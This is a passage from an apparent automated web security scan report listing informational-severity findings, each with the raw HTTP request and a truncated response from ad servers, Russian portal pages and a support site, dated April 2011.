document.write('<div style="height:90px;overflow:hidden;background:url(http://img.dt00.net/images/banners/ap-banner-bg.png) no-repeat;"><a href="http://usr.marketgid.com/demo/popunder/" target="_blan
...[SNIP]...
33.12. http://foreign.dt00.net/zones/zone40.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://foreign.dt00.net
Path:   /zones/zone40.php

Request

GET /zones/zone40.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://foreign.dt00.net/foreign/right_premium.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:03 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 536


document.write('<style type="text/css"> @import "http://oth.dt00.net/css/global/global.css"; </style> <ul class="box-title cr-5"><li class="cr-5"><span>..............</span></li></ul> <div class=
...[SNIP]...
33.13. http://goods.adnectar.com/static/quantcast_1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://goods.adnectar.com
Path:   /static/quantcast_1.html

Request

GET /static/quantcast_1.html HTTP/1.1
Host: goods.adnectar.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adnectar_id=PObkQ021gzROKXjpBM+iAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:36 GMT
Content-Type: text/html
Content-Length: 590
Last-Modified: Fri, 22 Apr 2011 00:28:44 GMT
Connection: close
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

</head>

<body>

<!-- Star
...[SNIP]...
33.14. http://ioerror.us/bb2-support-key  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ioerror.us
Path:   /bb2-support-key

Request

GET /bb2-support-key?key=adc1-d6f3-b783-0251 HTTP/1.1
Host: ioerror.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 25 Apr 2011 16:05:45 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Content-Length: 2119

<html>
<head>
<title>Technical Support</title>
<style type="text/css">
body { background: white; color: black; font-size: 12px; font-family: Tahoma,Verdana,Arial,sans-serif; text-align: center; }
#con
...[SNIP]...
33.15. http://kino.webalta.ru/banners.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kino.webalta.ru
Path:   /banners.xml

Request

GET /banners.xml HTTP/1.1
Host: kino.webalta.ru
Proxy-Connection: keep-alive
Referer: http://kino.webalta.ru/sc/l/banroll.swf?xml_path=/banners.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:20:33 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 3802

<?xml version="1.0" encoding="utf-8"?>
<flash_parameters copyright="anvsoftPFMTheme">
<preferences>
<golbal>
<basic_property movieWidth="620" movieHeight="348" html_title="Title" loadStyle
...[SNIP]...
33.16. http://kroogy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6; __utmc=221607367; __utmb=221607367.1.10.1303738749

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:38:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2090

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
33.17. http://l.azjmp.com/f.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.azjmp.com
Path:   /f.php

Request

GET /f.php?o=12743&e= HTTP/1.1
Host: l.azjmp.com
Proxy-Connection: keep-alive
Referer: http://www.reputationchanger.com/scheduled.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 16:06:11 GMT
Content-Type: text/html
Connection: close
Set-Cookie: OAID=025BED7B787B6DB50E0FAF2093A45A3D; Expires=Tue, 24 Apr 2012 16:06:11 GMT; Max-Age=31536000; Domain=azjmp.com; Path=/
P3P: policyref="http://azjmp.com/w3c/policy.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Content-Length: 39

<html><head></head><body></body></html>
33.18. http://my.webalta.ru/feed/l.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.webalta.ru
Path:   /feed/l.php

Request

GET /feed/l.php?url=&id=80 HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:09:20 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.9
Content-Length: 59948

... ...<?xml version="1.0" encoding="utf-8"?><response type="gameboss ver2.0"><result type="games">
<ITEM>
<ID>1093</ID>
<RATE>9999</RATE>
<NAME_URL>vanishing_hitchhiker_rus</NAME_URL>
<TYPE>65</TYP
...[SNIP]...
33.19. http://my.webalta.ru/public/visual/themes/css.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.webalta.ru
Path:   /public/visual/themes/css.php

Request

GET /public/visual/themes/css.php?st=theme1 HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:30:19 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.9
Content-Length: 170

.../* .... .....
*/
.theme_header { background: #7A96A7 url("/public/visual/themes/theme1/top.png"); }

/* .... ....
*/
.theme_body { background: #52677A; }
33.20. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=2208&ref2=elqNone&tzo=360&ms=121 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=8EE1D10DCCE142B68BB195EB59D8F5BA; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 12:52:48 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;
33.21. http://playaudiomessage.com/play.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://playaudiomessage.com
Path:   /play.asp

Request

GET /play.asp?m=538364&f=YNIZEE&ps=13&c=FFFFFF&pm=2&h=25 HTTP/1.1
Host: playaudiomessage.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 25 Apr 2011 19:34:37 GMT
ServerID: 52
P3P: "CP=\"IDC CSP DOR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\""
Content-Length: 1035
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASCRBCAQ=HGPKABGBGEKMJANEMNDJEEJA; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">

<title>InstantAudioPlayer</title>

...[SNIP]...
33.22. https://support.trust-guard.com/%22https:/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https:/

Request

GET /%22https:/ HTTP/1.1
Referer: https://support.trust-guard.com/%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:01:07 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.23. https://support.trust-guard.com/%22https://support.trust-guard.com/themes/client_default/space.gif/%22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https://support.trust-guard.com/themes/client_default/space.gif/%22

Request

GET /%22https://support.trust-guard.com/themes/client_default/space.gif/%22 HTTP/1.1
Referer: https://support.trust-guard.com/visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0&fullname=&email=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:02:07 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.24. https://support.trust-guard.com/%22https://support.trust-guard.com/themes/client_default/space.gif/Netsparker2267e00de35e4de2b8c35e57cf7b196a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https://support.trust-guard.com/themes/client_default/space.gif/Netsparker2267e00de35e4de2b8c35e57cf7b196a

Request

GET /%22https://support.trust-guard.com/themes/client_default/space.gif/Netsparker2267e00de35e4de2b8c35e57cf7b196a HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:02:25 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.25. https://support.trust-guard.com/%22https://support.trust-guard.com/themes/client_default/staffonline.gif/%22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https://support.trust-guard.com/themes/client_default/staffonline.gif/%22

Request

GET /%22https://support.trust-guard.com/themes/client_default/staffonline.gif/%22 HTTP/1.1
Referer: https://support.trust-guard.com/visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0&fullname=&email=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:03:34 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.26. https://support.trust-guard.com/%22https://support.trust-guard.com/themes/client_default/staffonline.gif/Netsparker41f6e7ea61624161af833141de098f10  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https://support.trust-guard.com/themes/client_default/staffonline.gif/Netsparker41f6e7ea61624161af833141de098f10

Request

GET /%22https://support.trust-guard.com/themes/client_default/staffonline.gif/Netsparker41f6e7ea61624161af833141de098f10 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:03:36 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.27. https://support.trust-guard.com/%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/%22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/%22

Request

GET /%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/%22 HTTP/1.1
Referer: https://support.trust-guard.com/visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0&fullname=&email=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:01:42 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.28. https://support.trust-guard.com/%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/Netsparkerb2f1dc51b97a4576a37594883bd4b9bf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/Netsparkerb2f1dc51b97a4576a37594883bd4b9bf

Request

GET /%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/Netsparkerb2f1dc51b97a4576a37594883bd4b9bf HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:01:59 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.29. https://support.trust-guard.com/%22https:/Netsparker244fdde99d984be78ada09aa500cf940/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https:/Netsparker244fdde99d984be78ada09aa500cf940/

Request

GET /%22https:/Netsparker244fdde99d984be78ada09aa500cf940/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:01:39 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.30. https://support.trust-guard.com/%22https:/support.trust-guard.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https:/support.trust-guard.com/

Request

GET /%22https:/support.trust-guard.com/ HTTP/1.1
Referer: https://support.trust-guard.com/%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:01:04 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.31. https://support.trust-guard.com/%22https:/support.trust-guard.com/Netsparkerac7b500341db48948b5d5d55d09dcbe3/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https:/support.trust-guard.com/Netsparkerac7b500341db48948b5d5d55d09dcbe3/

Request

GET /%22https:/support.trust-guard.com/Netsparkerac7b500341db48948b5d5d55d09dcbe3/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate
